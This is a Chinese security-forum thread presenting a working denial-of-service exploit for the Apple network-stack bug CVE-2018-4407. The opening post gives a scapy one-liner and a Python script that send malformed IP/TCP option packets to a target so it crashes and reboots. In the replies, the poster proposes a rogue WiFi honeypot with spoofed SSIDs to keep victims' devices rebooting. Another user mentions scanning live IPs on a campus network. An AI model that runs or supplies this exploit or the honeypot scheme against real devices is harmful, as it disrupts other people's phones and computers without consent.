吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3408|回复: 8
收起左侧

[Python 转载] [笔记] Apple设备缓冲区溢出漏洞(CVE-2018-4407)利用

[复制链接]
co3site 发表于 2018-11-10 13:52
本帖最后由 co3site 于 2018-11-10 14:01 编辑

CVE-2018-4407 为 Apple 设备的系统网络核心代码中出现的漏洞,利用该漏洞可以向同一局域网下的 Apple 设备发送的特定的 ICMP 数据包从而使目标设备崩溃后强制重启。苹果在10月30日推出的 iOS 12.1 更新包中彻底修复了这个漏洞。受影响的设备如下:

Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)
Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)
Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005修复)
Apple OS X El Capitan 及更早版本:所有设备


  • CVE-2018-4407 的利用:

    测试环境采用 Kali Linux ,为确保可以成功利用,请事先关闭防火墙。该利用过程中需使用 scapy 包(Kali自带),若未安装需先使用 pip 进行安装:

    pip install scapy
  1. 直接利用
    sudo scapy 
    send(IP(dst=“Target_IP“,options[IPOption(“A”*8)])/TCP(dport=8443,options=[(19, “1"*18),(19, “2”*18)]))

    利用过程中,如若未成功。自行修改 "A"*8 ==> "A"*18,或更大,端口修改为其他的开放端口进行测试。


  1. 采用 python 脚本进行利用
# CVE-2018-4407 ICMP DOS

import sys

try:

    from scapy.all import *

except Exception as e:

    print (" You need install scapy first:\n sudo pip install scapy ")

if __name__ == '__main__':
    port = 8443 #端口可修改为其他开放端口进行测试
    try:

        check_ip = sys.argv[1]

        print (" !!!!!! exploit !!!!!!")

        print (" Trying CVE-2018-4407 ICMP DOS " + check_ip)

        for i in range(8,50):

            send(IP(dst=check_ip,options=[IPOption("A"*i)])/TCP(dport=port,options=[(19, "1"*18),(19, "2"*18)]))

        print (" Check Over!! ")

    except Exception as e:

        print " usage: sudo python this.py Target_IP"

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

fq645122 发表于 2018-11-10 14:07
严重吗
???
新浪装修 发表于 2018-11-10 14:13
 楼主| co3site 发表于 2018-11-10 14:19

不是很严重,只是图个好玩,利用的局限性在于得都在于同一局域网下,会使Apple设备突然崩溃重启。目前大多升级后的设备都已修复了,不过还是有很多选择不升级的用户(逃
tanghengvip 发表于 2018-11-10 14:47
我想不到这个漏洞的应用场景
pasalai 发表于 2018-11-10 15:02
前几天我还便利了校园网内的存活IP,嘿嘿嘿
MengSec 发表于 2018-11-10 15:04
本帖最后由 MengSec 于 2018-11-10 15:06 编辑

大佬让我来给你补个视频。
https://v.qq.com/txp/iframe/player.html?vid=q0775hd6ow5
 楼主| co3site 发表于 2018-11-10 15:17
tanghengvip 发表于 2018-11-10 14:47
我想不到这个漏洞的应用场景

只是图个好玩吧:
自己架设一个 WIFI Honeypot,还可以伪造对方已连过的WIFI的SSID,进行信号挤占。给Apple设备分配静态IP。然后持久地对分配的静态IP派发ICMP数据包
=>最终的结果就是目标Apple设备一直处于重启状态
伯牙 发表于 2018-11-10 15:23
其实国内还是有许多未升级的设备的,这个利用率也不低。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-15 19:48

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表